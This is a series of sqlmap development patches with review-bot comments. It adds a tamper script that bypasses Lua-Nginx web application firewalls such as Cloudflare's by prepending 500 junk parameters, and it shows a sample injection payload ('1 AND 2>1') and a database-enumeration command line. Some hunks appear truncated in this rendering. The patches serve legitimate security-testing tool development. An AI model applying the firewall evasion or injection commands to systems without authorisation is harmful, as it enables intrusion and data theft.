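Review bot: The new `elif "ImportError" in excMsg:` branch at the top of the first hunk is a bare substring test placed ahead of every more specific handler, so any traceback that merely mentions ImportError now exits with the generic "invalid runtime environment" message. The `pymysql`/`configparser` branch in the second hunk looks like exactly such a case (a Python 3 dependency imported under Python 2), and if its traceback contains "ImportError" that branch is now unreachable. Either move the ImportError test after the specific checks or narrow it, e.g. `elif "ImportError" in excMsg and not all(_ in excMsg for _ in ("pymysql", "configparser")):`. Note also that `excMsg.split("ImportError: ")[-1]` falls back to the whole traceback when the colon-space form is absent, so the logged message can be long; `main()` starts and ends outside the hunk.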
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -72fce2cc366c9008550703643f8a6cc7 lib/core/settings.py +85a3e168b4685df50ceb26fa9bdf8cad lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -d94547672ec6dbc4c2adffbf62bd36d4 sqlmap.py +b84c70803012a374385ecc3e41a7e0dc sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 132e963b538275dd643a069f44374995baf67b13 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 24 Oct 2018 15:12:13 +0200 Subject: [PATCH 334/428] More general TypeMismatchException (for Hibernate too) --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e7cf7a45cab..079002946ca 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.28" +VERSION = "1.2.10.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -683,7 +683,7 @@ MAX_CONNECT_RETRIES = 100 # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cf5220d06ad..c19b544bbb1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -85a3e168b4685df50ceb26fa9bdf8cad lib/core/settings.py +77783316b43fe36fee4d5a987d4c612b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From dc65afe65a86b25029c561a78545491e660562e2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 24 Oct 2018 16:33:23 +0200 Subject: [PATCH 335/428] Minor update related to the #3283 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 5 +++++ 3 files changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 079002946ca..291931dca81 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.29" +VERSION = "1.2.10.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c19b544bbb1..843620ab7a1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -77783316b43fe36fee4d5a987d4c612b lib/core/settings.py +8abd15c74363a1de79976adeb95fba4a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -476,7 +476,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml +a676d93d413b07d36495201d88671253 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 5889f842eb9..e8001c3b937 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -135,4 +135,9 @@ + + + + + From 4466504f30dd5182b5e160bf987ec69df03ae9a8 Mon Sep 17 00:00:00 2001 
From: Jennifer Torres Date: Fri, 26 Oct 2018 11:04:37 +0100 Subject: [PATCH 336/428] Lua-Nginx WAFs Bypass (#3316) * Lua-Nginx WAFs Bypass Lua-Nginx WAFs doesn't support processing for more than 100 parameters. https://www.youtube.com/watch?v=JUvro7cqidY * Update luanginxwafbypass.py * Update luanginxwafbypass.py * Update luanginxwafbypass.py * Update luanginxwafbypass.py Update header. * Update luanginxwafbypass.py --- tamper/luanginxwafbypass.py | 51 +++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 tamper/luanginxwafbypass.py diff --git a/tamper/luanginxwafbypass.py b/tamper/luanginxwafbypass.py new file mode 100644 index 00000000000..5b694545b69 --- /dev/null +++ b/tamper/luanginxwafbypass.py 
@@ -0,0 +1,51 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +''' +[+] LUA-Nginx WAFs Bypass (Cloudflare) +Lua-Nginx WAFs doesn't support processing for more than 100 parameters. + +Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter +Required options: --skip-urlencode, -p +''' + +import sys +import string +import random +from lib.core.enums import PRIORITY +from lib.core.data import conf +__priority__ = PRIORITY.HIGHEST + +''' Random parameter''' +def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits): + output = ''.join(random.choice(chars) for _ in range(size)) + return output + +''' Tamper ''' +def tamper(payload, **kwargs): + try: + headers = kwargs.get("headers", {}) + randomParameter = randomParameterGenerator() + parameter = conf["testParameter"][0] + + if not parameter: + print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)" + sys.exit(0) + + if conf["skipUrlEncode"] != True: + print "\n[-] [ERROR] --skip-urlencode option must be activated" + sys.exit(0) + + # Add 500 parameters to payload + luaBypass = ("&" + randomParameter + "=")*500 + "&" + outputPayload = luaBypass + parameter + "=" + payload + + return outputPayload + except Exception as error: + print error + return None From 48b407c0fab343f66c4ad40f69a5d6cf209cb21f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 12:08:04 +0200 Subject: [PATCH 337/428] Updates regarding the #3316 --- doc/THANKS.md | 3 +++ lib/core/enums.py | 4 ++++ lib/core/settings.py | 2 +- lib/request/connect.py | 14 +++++++++++++- txt/checksum.md5 | 6 +++--- 5 files changed, 24 insertions(+), 5 deletions(-) diff --git a/doc/THANKS.md b/doc/THANKS.md index 94a32b480d0..e9e20cfdf3d 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md 
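Review bot: `tamper()` wraps its whole body in an `except Exception as error:` that prints the error to stdout and returns `None`, so a failure such as the `IndexError` from `conf["testParameter"][0]` when no `-p` was given (which also makes the `if not parameter:` check after it unreachable) hands a `None` payload back to the caller instead of surfacing through sqlmap's logger. The two configuration checks call `sys.exit(0)`, signalling success for an error condition. I would drop the try/except, test `conf.testParameter` for emptiness before indexing, and report the misconfiguration via `logger` with a non-zero exit; `headers` is read but never used.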
@@ -565,6 +565,9 @@ Efrain Torres, * for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository * for his great Metasploit WMAP Framework +Jennifer Torres, +* for contributing a tamper script luanginxwafbypass.py + Sandro Tosi, * for helping to create sqlmap Debian package correctly diff --git a/lib/core/enums.py b/lib/core/enums.py index 181cae66c17..45b08c526d1 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -378,3 +378,7 @@ class TIMEOUT_STATE: NORMAL = 0 EXCEPTION = 1 TIMEOUT = 2 + +class HINT: + PREPEND = 0 + APPEND = 1 \ No newline at end of file diff --git a/lib/core/settings.py b/lib/core/settings.py index 291931dca81..1b8cff3964a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.30" +VERSION = "1.2.10.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index d15a2c4d814..0c0067f4407 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -69,6 +69,7 @@ class WebSocketException(Exception): from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HINT from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION 
@@ -816,10 +817,14 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
 if payload:
+ delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER)
+
 if not disableTampering and kb.tamperFunctions:
 for function in kb.tamperFunctions:
+ hints = {}
+
 try:
- payload = function(payload=payload, headers=auxHeaders)
+ payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints)
 except Exception, ex:
 errMsg = "error occurred while running tamper "
 errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex))
@@ -832,6 +837,13 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 value = agent.replacePayload(value, payload)
+ if hints:
+ if HINT.APPEND in hints:
+ value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND])
+
+ if HINT.PREPEND in hints:
+ value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value)
+
 logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
 if place == PLACE.CUSTOM_POST and kb.postHint:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 843620ab7a1..fa2c02401be 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -37,7 +37,7 @@ ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py
 fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py
 ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py
 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py
-ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py
+0cf974cf4ff3b96e1a349a12e39f4693 lib/core/enums.py
 cada93357a7321655927fc9625b3bfec lib/core/exception.py
 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
 458a194764805cd8312c14ecd4be4d1e lib/core/log.py
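Review bot: `hints = {}` is created inside the `for function in kb.tamperFunctions:` loop, so when more than one tamper script is loaded each iteration discards the hints collected by the previous one and only the last script's `HINT.PREPEND`/`HINT.APPEND` reach the `if hints:` block in the second hunk. Move the initialisation above the loop (`hints = {}` immediately before `for function in kb.tamperFunctions:`) so the dict accumulates across scripts; a later script setting the same key would still overwrite an earlier one, which may be acceptable but deserves a comment. Indentation is lost in this rendering, so it is worth confirming that `if hints:` sits inside the `if not disableTampering and kb.tamperFunctions:` block; if it is outside, `hints` is unbound on the no-tamper path and the check raises `NameError`. `queryPage()` starts and ends outside the hunk.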
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8abd15c74363a1de79976adeb95fba4a lib/core/settings.py +737cfceb9db54a600e3983ef350f939a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -35db2a1779b9c71dfa183ac1f8995a5b lib/request/connect.py +95aeaefe56d22290b06c13acb13dfced lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From f2035145fe08b9c9fbbc6803e81d9bcffa8c486b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 12:10:22 +0200 Subject: [PATCH 338/428] Another update related to the #3316 --- doc/THANKS.md | 2 +- lib/core/settings.py | 2 +- tamper/luanginx.py | 36 ++++++++++++++++++++++++++ tamper/luanginxwafbypass.py | 51 ------------------------------------- txt/checksum.md5 | 3 ++- 5 files changed, 40 insertions(+), 54 deletions(-) create mode 100644 tamper/luanginx.py delete mode 100644 tamper/luanginxwafbypass.py diff --git a/doc/THANKS.md b/doc/THANKS.md index e9e20cfdf3d..e9eb7456d55 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -566,7 +566,7 @@ Efrain Torres, * for his great Metasploit WMAP Framework Jennifer Torres, -* for contributing a tamper script luanginxwafbypass.py +* for contributing a tamper script luanginx.py Sandro Tosi, * for helping to create sqlmap Debian package correctly 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 1b8cff3964a..4a61e03ff21 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.31" +VERSION = "1.2.10.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/luanginx.py b/tamper/luanginx.py new file mode 100644 index 00000000000..bca93e16e79 --- /dev/null +++ b/tamper/luanginx.py 
@@ -0,0 +1,36 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import string +import random + +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. Cloudflare) + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of more than 100 parameters + + >>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload) + '0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&W
s=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=>=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=&Ul=&1 AND 2>1' + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.letters + string.digits, 2)) for _ in xrange(500)) + + return payload diff --git a/tamper/luanginxwafbypass.py b/tamper/luanginxwafbypass.py deleted file mode 100644 index 5b694545b69..00000000000 --- a/tamper/luanginxwafbypass.py +++ /dev/null 
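Review bot: The parameter names are drawn from `string.letters + string.digits`, and `string.letters` is locale-dependent in Python 2 (and absent in Python 3), so both the generated names and the doctest's expected output vary with the process locale. Use `string.ascii_letters + string.digits` so the doctest is reproducible and the names stay within ASCII. `random.sample(..., 2)` also produces duplicate names across the 500 draws (the doctest output itself repeats e.g. `03=`), which is harmless for the stated purpose but could be recorded in the docstring's Notes section.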
@@ -1,51 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -''' -[+] LUA-Nginx WAFs Bypass (Cloudflare) -Lua-Nginx WAFs doesn't support processing for more than 100 parameters. - -Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter -Required options: --skip-urlencode, -p -''' - -import sys -import string -import random -from lib.core.enums import PRIORITY -from lib.core.data import conf -__priority__ = PRIORITY.HIGHEST - -''' Random parameter''' -def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits): - output = ''.join(random.choice(chars) for _ in range(size)) - return output - -''' Tamper ''' -def tamper(payload, **kwargs): - try: - headers = kwargs.get("headers", {}) - randomParameter = randomParameterGenerator() - parameter = conf["testParameter"][0] - - if not parameter: - print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)" - sys.exit(0) - - if conf["skipUrlEncode"] != True: - print "\n[-] [ERROR] --skip-urlencode option must be activated" - sys.exit(0) - - # Add 500 parameters to payload - luaBypass = ("&" + randomParameter + "=")*500 + "&" - outputPayload = luaBypass + parameter + "=" + payload - - return outputPayload - except Exception as error: - print error - return None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fa2c02401be..31960d072ab 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -737cfceb9db54a600e3983ef350f939a lib/core/settings.py +47482757115424a7155720ee7d3e0ced lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -261,6 +261,7 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py +a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py From 83081b5e14fec25b7bf1b6e615532d1c437b4361 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 14:00:51 +0200 Subject: [PATCH 339/428] Minor patch related to the #3316 --- lib/core/settings.py | 2 +- lib/request/connect.py | 7 ++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4a61e03ff21..010aed678b5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.32" +VERSION = "1.2.10.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 0c0067f4407..762b461cf70 100644 --- a/lib/request/connect.py 
+++ b/lib/request/connect.py
@@ -842,7 +842,12 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND])
 if HINT.PREPEND in hints:
- value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value)
+ if place == PLACE.URI:
+ match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value)
+ if match:
+ value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0)))
+ else:
+ value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value)
 logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 31960d072ab..c46e2c753c5 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-47482757115424a7155720ee7d3e0ced lib/core/settings.py
+0114b3012ea0ce300cf6ea339e8d54ef lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py
@@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py
 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py
-95aeaefe56d22290b06c13acb13dfced lib/request/connect.py
+0363fb0b3e58467ff5c915d1d85dfd3e lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py
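Review bot: In the new `PLACE.URI` branch, `value.replace(match.group(0), ...)` substitutes every occurrence of the matched text rather than the one the regex located, so a URI that repeats the same `name=` fragment would receive the prepended parameters more than once. Splicing at the match position is exact: `value = value[:match.start()] + "%s%s" % (hints[HINT.PREPEND], delimiter) + value[match.start():]`. The first pattern also interpolates `PAYLOAD_DELIMITER` unescaped while the second passes `delimiter` through `re.escape`; that is only safe while the constant contains no regex metacharacters (its value is not visible here), so wrapping it in `re.escape` as well would make the two patterns consistent. `queryPage()` starts and ends outside the hunk.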
From 92febd22a89a7827925e20c4d3375910d38882e1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 23:01:19 +0200 Subject: [PATCH 340/428] Minor update --- lib/controller/controller.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-)
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index a5f15ea3956..c63d7862a6b 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -60,6 +60,7 @@
